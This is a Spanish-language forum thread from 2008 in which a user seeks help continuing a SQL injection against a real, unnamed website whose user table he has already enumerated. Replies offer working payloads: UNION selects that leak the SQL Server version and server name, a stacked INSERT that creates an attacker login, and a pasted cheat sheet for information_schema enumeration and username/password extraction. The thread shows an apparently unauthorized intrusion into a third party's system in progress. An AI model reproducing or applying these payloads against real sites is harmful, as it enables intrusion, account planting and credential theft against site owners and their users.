elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Como seguir Con la inyeccion SQL
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Como seguir Con la inyeccion SQL  (Leído 3,908 veces)
MagnoBalt

Desconectado Desconectado

Mensajes: 58


Los Buenos Artitas Copian, los Grandes Roban


Ver Perfil
Como seguir Con la inyeccion SQL
« en: 26 Agosto 2008, 17:24 pm »

Hola que tal como va!! Encontre un pagina donde pude hacerles una inyecciones de SQL y me dio el nombre de la tabla mas Todas las culomnas..  les muestro algunas

dbo.tblUser.User_ID
dbo.tblUser.User_Code
dbo.tblUser.User_Password
dbo.tblUser.User_Permissions
dbo.tblUser.User_Number
dbo.tblUser.User_Firstname
dbo.tblUser.User_Surname
dbo.tblUser.User_TitleBefore
dbo.tblUser.User_TitleAfter
                  .
                  .

Ahora cuando llego a tratar de sacarle la version por ejemplo con esto:
'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
Me tira este error...
Citar
Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint.
Cuando me tendrai q dar algo asi..
Citar
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.2221.00 (Intel X86) Feb 9 2007 17:30:38 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to data type int.
Lo mismo pasa si pongo por ejemplo
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
No se a lo qiue se refiere con ese error...
Despues tambien como tengo las columnas intente agregar un registro con nombre de usuario y pass.. para loguearme puse
';INSERT INTO dbo.tblUser (User_Code, User_password) VALUES ('magnobalt', 'magno') --
Y obtengo este error:
Citar
error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated.

Entiendo Como si estoy queriendo ingresar un dato duplicado en la clave primaria... Pero Intente con numeros altos al lado de mi user y me sigue arrojando el mismo error...Pero creo q la columna user no creo q sea la clave primaria...alguna ayuda!!
Un abrazo
Si alguien me puede dar una mano!! Gracias
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Como seguir Con la inyeccion SQL
« Respuesta #1 en: 26 Agosto 2008, 18:42 pm »

capas que eso te sirve

*************************************************************************
*                        Information Schema                                                                       *
*************************************************************************

-1/**/union/**/select/**/0,1,2,3/*

*************************************************************************
*                       Nombre de las Tablas                                                                      *
*************************************************************************

-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/*

*************************************************************************
*                        Recorrer las Tablas                                                                         *
*************************************************************************

-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/1,1/*
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/2,1/*
-1/**/union/**/select/**/0,1,table_name,3/**/from/**/information_schema.tab les/**/limit/**/3,1/*

*************************************************************************
*                      Entrar en la Tabla                                                                             *
*************************************************************************

-1/**/union/**/select/**/0,1,2,3/**/from/**/NOMBRE_DE_LA_TABLA

*************************************************************************
*                   Buscar Columnas en Una Tabla                                                            *
*************************************************************************

-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/**/where/*

*/table_schema='NOMBRE_DB_AQUI'/**/and/**/table_name='NOMBRE_TABLA_AQUI'

                                            O

-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/*

*/where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/*

                          (N O M B R E   D E   L A   T A B L A   E N   A S C I I)

*************************************************************************
*                   Recorrer Datos de la Columna                                                              *
*************************************************************************

-1/**/union/**/select/**/0,1,column_name,3/**/from/**/information_schema.co lumns/*

*/where/**/table_name=char(97,100,109,105,110,105,115,116,114,97,116,105,11 8,111)/**/limit/**/0,1/*

                          (N O M B R E   D E   L A   T A B L A   E N   A S C I I)

*************************************************************************
*                              Concatenar                                                                              *
*************************************************************************

-1/**/union/**/select/**/0,1,concat(NOMBRE_COLUMNA,0x3a,NOMBRE_COLUMNA,0x3a ,etc),3/**/from/**/NOMBRE_DE_LA_TABLA/*

Ejemplo:

 -1/**/union/**/select/**/0,1,concat(username,0x3a,password,0x3a,email),3/ **/from/**/usuarios/*

**************************************************************************
*                        Funciones de Informaci?n                                                                 *
**************************************************************************

* version()      : version actual de mysql
* database()      : nombre base de datos
* user()      : conectado a la base de datos
* system_user()     
* session_user()
* current_user()
* last_insert_id()
* connection_id()

**************************************************************************
*                                By boER!                                                                                 *
**************************************************************************
*                                          Greets: Remote Execution                                               *
**************************************************************************

Fuente Remoteexecution.org
saludos
En línea

ChElAnO

Desconectado Desconectado

Mensajes: 129


Ver Perfil
Re: Como seguir Con la inyeccion SQL
« Respuesta #2 en: 26 Agosto 2008, 19:09 pm »

'union select @@version ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --

Citar
Error: ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Error converting data type nvarchar to bigint.

prueba poniendo lo que quieres sacar en otras posiciones de la consulta

'union select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
'union select 1,1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
.....
......

En línea

MagnoBalt

Desconectado Desconectado

Mensajes: 58


Los Buenos Artitas Copian, los Grandes Roban


Ver Perfil
Re: Como seguir Con la inyeccion SQL
« Respuesta #3 en: 26 Agosto 2008, 23:42 pm »

Ahi esta una ya solocione en vez  de colocarlo asi
'union select @@servername ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
Lo coloque asi
'union select  1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, @@servername --
y me dio su hermosoo Error
Citar
Error: ERROR [22018] [Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value 'WSMSSQL02..................' to data type int. 
Si alguien sabe A que se refiere con el error donde me dice que esta duplicando el dato en la clave primaria... coloco otra vez
Citar
error: ERROR [23000] [Microsoft][ODBC SQL Server Driver][SQL Server]Violation of UNIQUE KEY constraint 'IX_tblUser'. Cannot insert duplicate key in object 'dbo.tblUser'. ERROR [01000] [Microsoft][ODBC SQL Server Driver][SQL Server]The statement has been terminated.
Ahora vengo de la facu y sigo intentandoo..
Saludos
Grcias por la ayuda tambienn
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como seguir en Python
Scripting
Fyrox 1 1,898 Último mensaje 28 Septiembre 2011, 04:05 am
por Novlucker
Como evitar una inyección sql?
Nivel Web
andvilla07 1 2,098 Último mensaje 26 Noviembre 2012, 15:46 pm
por Shell Root
Cómo seguir comentando con tu pseudónimo o nick en YouTube
Noticias
wolfbcn 0 1,329 Último mensaje 10 Noviembre 2013, 21:59 pm
por wolfbcn
¿como me recomiendan seguir? (siguiendo la ruta de validacion de un .exe)
Ingeniería Inversa
tomasjrl 4 2,584 Último mensaje 2 Octubre 2014, 05:52 am
por tomasjrl
¿Como seguir con Java?
Programación General
JVulture 2 1,808 Último mensaje 3 Noviembre 2015, 11:18 am
por WhiteDeMoN
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines